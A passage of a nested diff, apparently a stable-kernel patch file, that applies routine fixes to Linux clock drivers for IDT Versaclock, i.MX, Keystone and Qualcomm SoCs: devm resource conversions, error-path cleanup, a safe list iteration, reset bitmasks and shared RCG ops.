+-	{ "5p49v5935", .driver_data = IDT_VC5_5P49V5935 },
+-	{ "5p49v6901", .driver_data = IDT_VC6_5P49V6901 },
+-	{ "5p49v6965", .driver_data = IDT_VC6_5P49V6965 },
+-	{ "5p49v6975", .driver_data = IDT_VC6_5P49V6975 },
++	{ "5p49v5923", .driver_data = (kernel_ulong_t)&idt_5p49v5923_info },
++	{ "5p49v5925", .driver_data = (kernel_ulong_t)&idt_5p49v5925_info },
++	{ "5p49v5933", .driver_data = (kernel_ulong_t)&idt_5p49v5933_info },
++	{ "5p49v5935", .driver_data = (kernel_ulong_t)&idt_5p49v5935_info },
++	{ "5p49v6901", .driver_data = (kernel_ulong_t)&idt_5p49v6901_info },
++	{ "5p49v6965", .driver_data = (kernel_ulong_t)&idt_5p49v6965_info },
++	{ "5p49v6975", .driver_data = (kernel_ulong_t)&idt_5p49v6975_info },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(i2c, vc5_id);
+diff --git a/drivers/clk/clk-versaclock7.c b/drivers/clk/clk-versaclock7.c
+index 8e4f86e852aa0..0ae191f50b4b2 100644
+--- a/drivers/clk/clk-versaclock7.c
++++ b/drivers/clk/clk-versaclock7.c
+@@ -1282,7 +1282,7 @@ static const struct regmap_config vc7_regmap_config = {
+ };
+ 
+ static const struct i2c_device_id vc7_i2c_id[] = {
+-	{ "rc21008a", VC7_RC21008A },
++	{ "rc21008a", .driver_data = (kernel_ulong_t)&vc7_rc21008a_info },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(i2c, vc7_i2c_id);
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index 57b83665e5c3a..e0de6565800d2 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -1525,6 +1525,7 @@ void clk_hw_forward_rate_request(const struct clk_hw *hw,
+ 				  parent->core, req,
+ 				  parent_rate);
+ }
++EXPORT_SYMBOL_GPL(clk_hw_forward_rate_request);
+ 
+ static bool clk_core_can_round(struct clk_core * const core)
+ {
+@@ -4650,6 +4651,7 @@ int devm_clk_notifier_register(struct device *dev, struct clk *clk,
+ 	if (!ret) {
+ 		devres->clk = clk;
+ 		devres->nb = nb;
++		devres_add(dev, devres);
+ 	} else {
+ 		devres_free(devres);
+ 	}
+diff --git a/drivers/clk/imx/clk-imx8mn.c b/drivers/clk/imx/clk-imx8mn.c
+index 2afea905f7f3c..b2b8b8b3f0ab8 100644
+--- a/drivers/clk/imx/clk-imx8mn.c
++++ b/drivers/clk/imx/clk-imx8mn.c
+@@ -323,7 +323,7 @@ static int imx8mn_clocks_probe(struct platform_device *pdev)
+ 	void __iomem *base;
+ 	int ret;
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws,
+ 					  IMX8MN_CLK_END), GFP_KERNEL);
+ 	if (WARN_ON(!clk_hw_data))
+ 		return -ENOMEM;
+@@ -340,10 +340,10 @@ static int imx8mn_clocks_probe(struct platform_device *pdev)
+ 	hws[IMX8MN_CLK_EXT4] = imx_obtain_fixed_clk_hw(np, "clk_ext4");
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx8mn-anatop");
+-	base = of_iomap(np, 0);
++	base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+-	if (WARN_ON(!base)) {
+-		ret = -ENOMEM;
++	if (WARN_ON(IS_ERR(base))) {
++		ret = PTR_ERR(base);
+ 		goto unregister_hws;
+ 	}
+ 
+diff --git a/drivers/clk/imx/clk-imx8mp.c b/drivers/clk/imx/clk-imx8mp.c
+index 5d68d975b4eb1..05c02f4e2a143 100644
+--- a/drivers/clk/imx/clk-imx8mp.c
++++ b/drivers/clk/imx/clk-imx8mp.c
+@@ -413,25 +413,22 @@ static int imx8mp_clocks_probe(struct platform_device *pdev)
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *np;
+ 	void __iomem *anatop_base, *ccm_base;
++	int err;
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx8mp-anatop");
+-	anatop_base = of_iomap(np, 0);
++	anatop_base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+-	if (WARN_ON(!anatop_base))
+-		return -ENOMEM;
++	if (WARN_ON(IS_ERR(anatop_base)))
++		return PTR_ERR(anatop_base);
+ 
+ 	np = dev->of_node;
+ 	ccm_base = devm_platform_ioremap_resource(pdev, 0);
+-	if (WARN_ON(IS_ERR(ccm_base))) {
+-		iounmap(anatop_base);
++	if (WARN_ON(IS_ERR(ccm_base)))
+ 		return PTR_ERR(ccm_base);
+-	}
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws, IMX8MP_CLK_END), GFP_KERNEL);
+-	if (WARN_ON(!clk_hw_data)) {
+-		iounmap(anatop_base);
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws, IMX8MP_CLK_END), GFP_KERNEL);
++	if (WARN_ON(!clk_hw_data))
+ 		return -ENOMEM;
+-	}
+ 
+ 	clk_hw_data->num = IMX8MP_CLK_END;
+ 	hws = clk_hw_data->hws;
+@@ -711,7 +708,12 @@ static int imx8mp_clocks_probe(struct platform_device *pdev)
+ 
+ 	imx_check_clk_hws(hws, IMX8MP_CLK_END);
+ 
+-	of_clk_add_hw_provider(np, of_clk_hw_onecell_get, clk_hw_data);
++	err = of_clk_add_hw_provider(np, of_clk_hw_onecell_get, clk_hw_data);
++	if (err < 0) {
++		dev_err(dev, "failed to register hws for i.MX8MP\n");
++		imx_unregister_hw_clocks(hws, IMX8MP_CLK_END);
++		return err;
++	}
+ 
+ 	imx_register_uart_clocks(4);
+ 
+diff --git a/drivers/clk/imx/clk-imx93.c b/drivers/clk/imx/clk-imx93.c
+index 02d6a9894521d..5e3d299190c89 100644
+--- a/drivers/clk/imx/clk-imx93.c
++++ b/drivers/clk/imx/clk-imx93.c
+@@ -261,7 +261,7 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 	void __iomem *base, *anatop_base;
+ 	int i, ret;
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws,
+ 					  IMX93_CLK_END), GFP_KERNEL);
+ 	if (!clk_hw_data)
+ 		return -ENOMEM;
+@@ -285,10 +285,12 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 								    "sys_pll_pfd2", 1, 2);
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx93-anatop");
+-	anatop_base = of_iomap(np, 0);
++	anatop_base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+-	if (WARN_ON(!anatop_base))
+-		return -ENOMEM;
++	if (WARN_ON(IS_ERR(anatop_base))) {
++		ret = PTR_ERR(base);
++		goto unregister_hws;
++	}
+ 
+ 	clks[IMX93_CLK_AUDIO_PLL] = imx_clk_fracn_gppll("audio_pll", "osc_24m", anatop_base + 0x1200,
+ 							&imx_fracn_gppll);
+@@ -298,8 +300,8 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 	np = dev->of_node;
+ 	base = devm_platform_ioremap_resource(pdev, 0);
+ 	if (WARN_ON(IS_ERR(base))) {
+-		iounmap(anatop_base);
+-		return PTR_ERR(base);
++		ret = PTR_ERR(base);
++		goto unregister_hws;
+ 	}
+ 
+ 	for (i = 0; i < ARRAY_SIZE(root_array); i++) {
+@@ -329,7 +331,6 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 
+ unregister_hws:
+ 	imx_unregister_hw_clocks(clks, IMX93_CLK_END);
+-	iounmap(anatop_base);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/clk/imx/clk-imxrt1050.c b/drivers/clk/imx/clk-imxrt1050.c
+index 26108e9f7e67a..64d8b65a81040 100644
+--- a/drivers/clk/imx/clk-imxrt1050.c
++++ b/drivers/clk/imx/clk-imxrt1050.c
+@@ -42,7 +42,7 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 	struct device_node *anp;
+ 	int ret;
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws,
+ 					  IMXRT1050_CLK_END), GFP_KERNEL);
+ 	if (WARN_ON(!clk_hw_data))
+ 		return -ENOMEM;
+@@ -53,10 +53,12 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 	hws[IMXRT1050_CLK_OSC] = imx_obtain_fixed_clk_hw(np, "osc");
+ 
+ 	anp = of_find_compatible_node(NULL, NULL, "fsl,imxrt-anatop");
+-	pll_base = of_iomap(anp, 0);
++	pll_base = devm_of_iomap(dev, anp, 0, NULL);
+ 	of_node_put(anp);
+-	if (WARN_ON(!pll_base))
+-		return -ENOMEM;
++	if (WARN_ON(IS_ERR(pll_base))) {
++		ret = PTR_ERR(pll_base);
++		goto unregister_hws;
++	}
+ 
+ 	/* Anatop clocks */
+ 	hws[IMXRT1050_CLK_DUMMY] = imx_clk_hw_fixed("dummy", 0UL);
+@@ -104,8 +106,10 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 
+ 	/* CCM clocks */
+ 	ccm_base = devm_platform_ioremap_resource(pdev, 0);
+-	if (WARN_ON(IS_ERR(ccm_base)))
+-		return PTR_ERR(ccm_base);
++	if (WARN_ON(IS_ERR(ccm_base))) {
++		ret = PTR_ERR(ccm_base);
++		goto unregister_hws;
++	}
+ 
+ 	hws[IMXRT1050_CLK_ARM_PODF] = imx_clk_hw_divider("arm_podf", "pll1_arm", ccm_base + 0x10, 0, 3);
+ 	hws[IMXRT1050_CLK_PRE_PERIPH_SEL] = imx_clk_hw_mux("pre_periph_sel", ccm_base + 0x18, 18, 2,
+@@ -148,8 +152,12 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 	ret = of_clk_add_hw_provider(np, of_clk_hw_onecell_get, clk_hw_data);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Failed to register clks for i.MXRT1050.\n");
+-		imx_unregister_hw_clocks(hws, IMXRT1050_CLK_END);
++		goto unregister_hws;
+ 	}
++	return 0;
++
++unregister_hws:
++	imx_unregister_hw_clocks(hws, IMXRT1050_CLK_END);
+ 	return ret;
+ }
+ static const struct of_device_id imxrt1050_clk_of_match[] = {
+diff --git a/drivers/clk/imx/clk-scu.c b/drivers/clk/imx/clk-scu.c
+index 1e6870f3671f6..db307890e4c16 100644
+--- a/drivers/clk/imx/clk-scu.c
++++ b/drivers/clk/imx/clk-scu.c
+@@ -707,11 +707,11 @@ struct clk_hw *imx_clk_scu_alloc_dev(const char *name,
+ 
+ void imx_clk_scu_unregister(void)
+ {
+-	struct imx_scu_clk_node *clk;
++	struct imx_scu_clk_node *clk, *n;
+ 	int i;
+ 
+ 	for (i = 0; i < IMX_SC_R_LAST; i++) {
+-		list_for_each_entry(clk, &imx_scu_clks[i], node) {
++		list_for_each_entry_safe(clk, n, &imx_scu_clks[i], node) {
+ 			clk_hw_unregister(clk->hw);
+ 			kfree(clk);
+ 		}
+diff --git a/drivers/clk/keystone/sci-clk.c b/drivers/clk/keystone/sci-clk.c
+index d4b4e74e22da6..254f2cf24be21 100644
+--- a/drivers/clk/keystone/sci-clk.c
++++ b/drivers/clk/keystone/sci-clk.c
+@@ -294,6 +294,8 @@ static int _sci_clk_build(struct sci_clk_provider *provider,
+ 
+ 	name = kasprintf(GFP_KERNEL, "clk:%d:%d", sci_clk->dev_id,
+ 			 sci_clk->clk_id);
++	if (!name)
++		return -ENOMEM;
+ 
+ 	init.name = name;
+ 
+diff --git a/drivers/clk/qcom/camcc-sc7180.c b/drivers/clk/qcom/camcc-sc7180.c
+index e2b4804695f37..8a4ba7a19ed12 100644
+--- a/drivers/clk/qcom/camcc-sc7180.c
++++ b/drivers/clk/qcom/camcc-sc7180.c
+@@ -1480,12 +1480,21 @@ static struct clk_branch cam_cc_sys_tmr_clk = {
+ 	},
+ };
+ 
++static struct gdsc titan_top_gdsc = {
++	.gdscr = 0xb134,
++	.pd = {
++		.name = "titan_top_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++};
++
+ static struct gdsc bps_gdsc = {
+ 	.gdscr = 0x6004,
+ 	.pd = {
+ 		.name = "bps_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &titan_top_gdsc.pd,
+ 	.flags = HW_CTRL,
+ };
+ 
+@@ -1495,6 +1504,7 @@ static struct gdsc ife_0_gdsc = {
+ 		.name = "ife_0_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &titan_top_gdsc.pd,
+ };
+ 
+ static struct gdsc ife_1_gdsc = {
+@@ -1503,6 +1513,7 @@ static struct gdsc ife_1_gdsc = {
+ 		.name = "ife_1_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &titan_top_gdsc.pd,
+ };
+ 
+ static struct gdsc ipe_0_gdsc = {
+@@ -1512,15 +1523,9 @@ static struct gdsc ipe_0_gdsc = {
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+ 	.flags = HW_CTRL,
++	.parent = &titan_top_gdsc.pd,
+ };
+ 
+-static struct gdsc titan_top_gdsc = {
+-	.gdscr = 0xb134,
+-	.pd = {
+-		.name = "titan_top_gdsc",
+-	},
+-	.pwrsts = PWRSTS_OFF_ON,
+-};
+ 
+ static struct clk_hw *cam_cc_sc7180_hws[] = {
+ 	[CAM_CC_PLL2_OUT_EARLY] = &cam_cc_pll2_out_early.hw,
+diff --git a/drivers/clk/qcom/dispcc-qcm2290.c b/drivers/clk/qcom/dispcc-qcm2290.c
+index 24755dc841f9d..5cec98c4e8372 100644
+--- a/drivers/clk/qcom/dispcc-qcm2290.c
++++ b/drivers/clk/qcom/dispcc-qcm2290.c
+@@ -23,9 +23,11 @@
+ 
+ enum {
+ 	P_BI_TCXO,
++	P_BI_TCXO_AO,
+ 	P_DISP_CC_PLL0_OUT_MAIN,
+ 	P_DSI0_PHY_PLL_OUT_BYTECLK,
+ 	P_DSI0_PHY_PLL_OUT_DSICLK,
++	P_GPLL0_OUT_DIV,
+ 	P_GPLL0_OUT_MAIN,
+ 	P_SLEEP_CLK,
+ };
+@@ -81,8 +83,8 @@ static const struct clk_parent_data disp_cc_parent_data_1[] = {
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_2[] = {
+-	{ P_BI_TCXO, 0 },
+-	{ P_GPLL0_OUT_MAIN, 4 },
++	{ P_BI_TCXO_AO, 0 },
++	{ P_GPLL0_OUT_DIV, 4 },
+ };
+ 
+ static const struct clk_parent_data disp_cc_parent_data_2[] = {
+@@ -150,9 +152,9 @@ static struct clk_regmap_div disp_cc_mdss_byte0_div_clk_src = {
+ };
+ 
+ static const struct freq_tbl ftbl_disp_cc_mdss_ahb_clk_src[] = {
+-	F(19200000, P_BI_TCXO, 1, 0, 0),
+-	F(37500000, P_GPLL0_OUT_MAIN, 8, 0, 0),
+-	F(75000000, P_GPLL0_OUT_MAIN, 4, 0, 0),
++	F(19200000, P_BI_TCXO_AO, 1, 0, 0),
++	F(37500000, P_GPLL0_OUT_DIV, 8, 0, 0),
++	F(75000000, P_GPLL0_OUT_DIV, 4, 0, 0),
+ 	{ }
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-ipq6018.c b/drivers/clk/qcom/gcc-ipq6018.c
+index 3f9c2f61a5d93..cde62a11f5736 100644
+--- a/drivers/clk/qcom/gcc-ipq6018.c
++++ b/drivers/clk/qcom/gcc-ipq6018.c
+@@ -1654,7 +1654,7 @@ static struct clk_rcg2 sdcc1_apps_clk_src = {
+ 		.name = "sdcc1_apps_clk_src",
+ 		.parent_data = gcc_xo_gpll0_gpll2_gpll0_out_main_div2,
+ 		.num_parents = 4,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+ 
+@@ -4517,24 +4517,24 @@ static const struct qcom_reset_map gcc_ipq6018_resets[] = {
+ 	[GCC_PCIE0_AHB_ARES] = { 0x75040, 5 },
+ 	[GCC_PCIE0_AXI_MASTER_STICKY_ARES] = { 0x75040, 6 },
+ 	[GCC_PCIE0_AXI_SLAVE_STICKY_ARES] = { 0x75040, 7 },
+-	[GCC_PPE_FULL_RESET] = { 0x68014, 0 },
+-	[GCC_UNIPHY0_SOFT_RESET] = { 0x56004, 0 },
++	[GCC_PPE_FULL_RESET] = { .reg = 0x68014, .bitmask = 0xf0000 },
++	[GCC_UNIPHY0_SOFT_RESET] = { .reg = 0x56004, .bitmask = 0x3ff2 },
+ 	[GCC_UNIPHY0_XPCS_RESET] = { 0x56004, 2 },
+-	[GCC_UNIPHY1_SOFT_RESET] = { 0x56104, 0 },
++	[GCC_UNIPHY1_SOFT_RESET] = { .reg = 0x56104, .bitmask = 0x32 },
+ 	[GCC_UNIPHY1_XPCS_RESET] = { 0x56104, 2 },
+-	[GCC_EDMA_HW_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT1_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT2_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT3_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT4_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT5_RESET] = { 0x68014, 0 },
+-	[GCC_UNIPHY0_PORT1_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT2_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT3_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT4_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT5_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT_4_5_RESET] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT_4_RESET] = { 0x56004, 0 },
++	[GCC_EDMA_HW_RESET] = { .reg = 0x68014, .bitmask = 0x300000 },
++	[GCC_NSSPORT1_RESET] = { .reg = 0x68014, .bitmask = 0x1000003 },
++	[GCC_NSSPORT2_RESET] = { .reg = 0x68014, .bitmask = 0x200000c },
++	[GCC_NSSPORT3_RESET] = { .reg = 0x68014, .bitmask = 0x4000030 },
++	[GCC_NSSPORT4_RESET] = { .reg = 0x68014, .bitmask = 0x8000300 },
++	[GCC_NSSPORT5_RESET] = { .reg = 0x68014, .bitmask = 0x10000c00 },
++	[GCC_UNIPHY0_PORT1_ARES] = { .reg = 0x56004, .bitmask = 0x30 },
++	[GCC_UNIPHY0_PORT2_ARES] = { .reg = 0x56004, .bitmask = 0xc0 },
++	[GCC_UNIPHY0_PORT3_ARES] = { .reg = 0x56004, .bitmask = 0x300 },
++	[GCC_UNIPHY0_PORT4_ARES] = { .reg = 0x56004, .bitmask = 0xc00 },
++	[GCC_UNIPHY0_PORT5_ARES] = { .reg = 0x56004, .bitmask = 0x3000 },
++	[GCC_UNIPHY0_PORT_4_5_RESET] = { .reg = 0x56004, .bitmask = 0x3c02 },
++	[GCC_UNIPHY0_PORT_4_RESET] = { .reg = 0x56004, .bitmask = 0xc02 },
+ 	[GCC_LPASS_BCR] = {0x1F000, 0},
+ 	[GCC_UBI32_TBU_BCR] = {0x65000, 0},
+ 	[GCC_LPASS_TBU_BCR] = {0x6C000, 0},
+diff --git a/drivers/clk/qcom/gcc-qcm2290.c b/drivers/clk/qcom/gcc-qcm2290.c
+index 096deff2ba257..48995e50c6bd7 100644
+--- a/drivers/clk/qcom/gcc-qcm2290.c
++++ b/drivers/clk/qcom/gcc-qcm2290.c
+@@ -650,7 +650,7 @@ static struct clk_rcg2 gcc_usb30_prim_mock_utmi_clk_src = {
+ 		.name = "gcc_usb30_prim_mock_utmi_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -686,7 +686,7 @@ static struct clk_rcg2 gcc_camss_axi_clk_src = {
+ 		.name = "gcc_camss_axi_clk_src",
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -706,7 +706,7 @@ static struct clk_rcg2 gcc_camss_cci_clk_src = {
+ 		.name = "gcc_camss_cci_clk_src",
+ 		.parent_data = gcc_parents_9,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_9),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -728,7 +728,7 @@ static struct clk_rcg2 gcc_camss_csi0phytimer_clk_src = {
+ 		.name = "gcc_camss_csi0phytimer_clk_src",
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -742,7 +742,7 @@ static struct clk_rcg2 gcc_camss_csi1phytimer_clk_src = {
+ 		.name = "gcc_camss_csi1phytimer_clk_src",
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -764,7 +764,7 @@ static struct clk_rcg2 gcc_camss_mclk0_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -779,7 +779,7 @@ static struct clk_rcg2 gcc_camss_mclk1_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -794,7 +794,7 @@ static struct clk_rcg2 gcc_camss_mclk2_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -809,7 +809,7 @@ static struct clk_rcg2 gcc_camss_mclk3_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -830,7 +830,7 @@ static struct clk_rcg2 gcc_camss_ope_ahb_clk_src = {
+ 		.name = "gcc_camss_ope_ahb_clk_src",
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -854,7 +854,7 @@ static struct clk_rcg2 gcc_camss_ope_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -888,7 +888,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_clk_src = {
+ 		.name = "gcc_camss_tfe_0_clk_src",
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -912,7 +912,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_csid_clk_src = {
+ 		.name = "gcc_camss_tfe_0_csid_clk_src",
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -926,7 +926,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_clk_src = {
+ 		.name = "gcc_camss_tfe_1_clk_src",
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -940,7 +940,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_csid_clk_src = {
+ 		.name = "gcc_camss_tfe_1_csid_clk_src",
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -963,7 +963,7 @@ static struct clk_rcg2 gcc_camss_tfe_cphy_rx_clk_src = {
+ 		.parent_data = gcc_parents_10,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_10),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -984,7 +984,7 @@ static struct clk_rcg2 gcc_camss_top_ahb_clk_src = {
+ 		.name = "gcc_camss_top_ahb_clk_src",
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1006,7 +1006,7 @@ static struct clk_rcg2 gcc_gp1_clk_src = {
+ 		.name = "gcc_gp1_clk_src",
+ 		.parent_data = gcc_parents_2,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_2),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1020,7 +1020,7 @@ static struct clk_rcg2 gcc_gp2_clk_src = {
+ 		.name = "gcc_gp2_clk_src",
+ 		.parent_data = gcc_parents_2,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_2),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1034,7 +1034,7 @@ static struct clk_rcg2 gcc_gp3_clk_src = {
+ 		.name = "gcc_gp3_clk_src",
+ 		.parent_data = gcc_parents_2,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_2),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1054,7 +1054,7 @@ static struct clk_rcg2 gcc_pdm2_clk_src = {
+ 		.name = "gcc_pdm2_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1082,7 +1082,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s0_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s0_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s0_clk_src = {
+@@ -1098,7 +1098,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s1_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s1_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s1_clk_src = {
+@@ -1114,7 +1114,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s2_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s2_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s2_clk_src = {
+@@ -1130,7 +1130,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s3_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s3_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s3_clk_src = {
+@@ -1146,7 +1146,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s4_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s4_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s4_clk_src = {
+@@ -1162,7 +1162,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s5_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s5_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
